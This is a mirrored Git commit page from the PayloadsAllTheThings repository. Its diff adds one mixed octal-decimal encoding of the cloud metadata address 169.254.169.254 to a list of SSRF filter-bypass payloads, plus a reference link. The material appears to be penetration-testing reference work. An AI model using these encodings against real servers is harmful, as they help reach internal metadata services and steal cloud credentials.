mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #485 from ajdumanhug/master
SSRF: Don't encode entire IP
This commit is contained in:
Swissky
GitHub
commit
fb7f10eab8
@ -580,6 +580,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal
|
|||||||
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
|
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
|
||||||
http://0251.0376.0251.0376/ Dotted octal
|
http://0251.0376.0251.0376/ Dotted octal
|
||||||
http://0251.00376.000251.0000376/ Dotted octal with padding
|
http://0251.00376.000251.0000376/ Dotted octal with padding
|
||||||
|
http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
|
||||||
```
|
```
|
||||||
|
|
||||||
More urls to include
|
More urls to include
|
||||||
@ -863,3 +864,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
|
|||||||
- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
|
- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
|
||||||
- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)
|
- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)
|
||||||
- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
|
- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
|
||||||
|
- [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080)
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user